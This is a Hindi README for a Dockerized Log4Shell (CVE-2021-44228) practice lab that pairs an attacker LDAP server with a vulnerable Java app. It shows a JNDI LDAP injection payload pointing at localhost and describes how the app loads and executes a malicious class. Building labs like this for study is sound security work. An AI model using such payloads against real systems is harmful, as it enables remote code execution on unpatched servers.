CVE-2021-44228 (Log4Shell) भेद्यता लैब वातावरण
परिचय
यह परियोजना CVE-2021-44228 (Log4Shell) के रूप में ज्ञात गंभीर Log4j भेद्यता को सुरक्षित रूप से अभ्यास करने और समझने के लिए एक डॉकराइज़्ड वातावरण प्रदान करती है।
मुख्य विशेषताएँ
- सुरक्षित डॉकराइज़्ड परीक्षण वातावरण
- कस्टम पेलोड परीक्षण क्षमता
- हमलावर का LDAP सर्वर और भेद्य Java एप्लिकेशन शामिल है
आरंभ करना
docker compose up --build
पेलोड परीक्षण
- आप
/vulnerable/Makefile के परीक्षण अनुभाग में पेलोड को संशोधित कर सकते हैं
- डिफ़ॉल्ट पेलोड
$${jndi:ldap://127.0.0.1:10000/} का उपयोग करता है
यह कैसे काम करता है
- भेद्य Java एप्लिकेशन प्रारंभ होता है
- हमलावर का LDAP सर्वर पोर्ट 10000 पर सुनता है
- भेद्य एप्लिकेशन चलता है
- Log4Shell पेलोड Makefile परीक्षण अनुभाग के माध्यम से भेद्य एप्लिकेशन में लॉग किया जाता है
- भेद्य एप्लिकेशन JNDI LDAP लुकअप का प्रयास करता है
- LDAP सर्वर एक दुर्भावनापूर्ण Java क्लास लौटाता है
- भेद्य एप्लिकेशन इस क्लास को लोड और निष्पादित करता है